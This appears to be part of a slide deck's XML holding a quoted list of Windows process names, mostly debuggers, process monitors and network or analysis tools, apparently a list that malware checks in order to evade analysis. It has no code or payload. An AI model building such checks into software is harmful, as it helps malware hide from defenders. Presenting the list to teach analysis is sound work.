            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"shutdownmon.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>"autoruns.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"icesword.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"pr0c3xp.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"sniffhit.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"autorunsc.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"iclicker-release.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>".exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"prince.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"snoop.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"autoscreenshotter.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"idag.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"procanalyzer.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"spkrmon.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Google Shape;468;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3380100" y="1152475"/>
            <a:ext cx="1826100" cy="389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900"/>
              <a:t>"avctestsuite.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"idag64.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>"processhacker.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"sysanalyzer.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"avz.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"idaq.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"processmemdump.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"syser.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"behaviordumper.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"immunitydebugger.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"procexp.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"systemexplorer.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"bindiff.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"importrec.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>"procexp64.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"systemexplorerservice.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"BTPTrayIcon.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"imul.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>"procmon.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"sython.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"capturebat.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"Infoclient.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>"procmon64.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"taskmgr.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"cdb.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Google Shape;469;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4931675" y="1152475"/>
            <a:ext cx="1542900" cy="370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900"/>
              <a:t>"installrite.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"python.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"taslogin.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"ipfs.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"pythonw.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>"tcpdump.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"clicksharelauncher.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"iprosetmonitor.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"qq.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"tcpview.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"closepopup.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"iragent.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"qqffo.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"timeout.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"commview.exe",</a:t>
            </a:r>
